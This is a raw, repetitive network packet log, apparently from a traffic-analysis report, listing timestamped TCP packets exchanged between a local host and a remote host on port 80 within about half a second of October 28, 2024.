                                                                                                    Oct 28, 2024 07:18:47.995707035 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995718956 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995728016 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995737076 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995758057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.995764017 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995775938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995788097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995800972 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995847940 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995933056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995943069 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995953083 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995965958 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995976925 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.995987892 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.996053934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.996053934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.996053934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.996053934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.996054888 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.996054888 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.037106037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.037125111 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.037138939 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.037436962 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078349113 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078377008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078388929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078402042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078413010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078423977 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078516960 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078561068 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078567982 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078609943 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078622103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078660011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078670025 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078680992 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078695059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078706026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078726053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078773975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078784943 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078794003 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078814030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078830004 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078840971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078840971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078840971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078840971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078843117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078840971 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078841925 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078855038 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078866005 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078866005 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.078876972 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078887939 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078901052 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.078910112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.079085112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091635942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091660976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091674089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091701984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091711044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091728926 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091742992 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091758013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091772079 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091780901 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091837883 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091856956 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091856956 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091857910 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091857910 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091908932 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091919899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091934919 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091948032 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091954947 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091958046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091969013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091979980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.091999054 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.091999054 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092005968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092040062 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092071056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092082024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092114925 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092135906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092149019 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092159986 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092189074 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092211962 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092223883 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092231035 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092236042 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092246056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092255116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092267036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092288971 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092291117 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092291117 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092305899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092319012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092329025 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092329979 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092350960 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092401981 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092421055 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092432976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092449903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092461109 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092473984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092488050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092493057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092493057 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092530012 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092643976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092655897 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092667103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092685938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092699051 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092699051 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092708111 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.092751026 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.092751026 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.112063885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112082005 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112099886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112112999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112123013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112134933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112148046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112181902 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112185001 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.112193108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112224102 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.112227917 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112238884 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.112241030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.112296104 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.113843918 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113877058 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113888979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113924980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113936901 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113941908 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.113941908 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.113948107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113960028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113971949 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.113984108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114027023 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114027023 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114063978 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114080906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114092112 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114103079 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114115000 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114125967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114140034 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114150047 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114150047 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114157915 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114167929 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114171028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114183903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114192963 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114221096 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114221096 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114231110 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114242077 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114253998 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114264965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114289999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114300966 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114317894 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114317894 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114326954 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114336014 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114340067 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114353895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114365101 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114373922 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114407063 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114407063 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114423037 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114439011 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114454985 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114466906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114479065 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114497900 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114510059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114521027 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114531040 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114531040 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114605904 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114618063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114629030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114643097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114648104 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114671946 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114671946 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114679098 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114690065 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114700079 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114706993 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114716053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114742994 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114757061 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114757061 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114759922 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114773035 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114784002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114795923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114826918 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114826918 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114826918 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114834070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114844084 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114861012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114871979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114891052 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114893913 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.114924908 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114934921 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.114950895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115015984 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115029097 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115039110 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115051985 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115063906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115077019 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115096092 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115169048 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115183115 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115194082 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115205050 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115217924 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115230083 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115258932 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115271091 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115282059 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.115283012 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115283012 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115334988 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.115334988 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.156164885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.156184912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.156198025 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.156315088 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504456043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504494905 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504507065 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504517078 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504528999 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504540920 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504550934 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504556894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504563093 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504566908 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504617929 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504618883 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504647970 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504659891 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504669905 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504681110 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504692078 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504697084 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504700899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504713058 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504724979 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504726887 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504739046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504750967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504753113 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504760981 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504779100 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504790068 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504798889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504833937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504833937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504833937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504863977 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504875898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504884958 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504894972 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504909992 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504920006 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504928112 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504930973 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504940987 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504942894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504952908 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504952908 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504965067 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504976034 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.504985094 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.504987955 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505002975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505014896 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505024910 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505029917 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505029917 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505036116 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505048037 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505064964 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505067110 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505075932 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505080938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505086899 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:48.505091906 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505103111 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:48.505106926 CET4971780192.168.2.8185.215.113.16
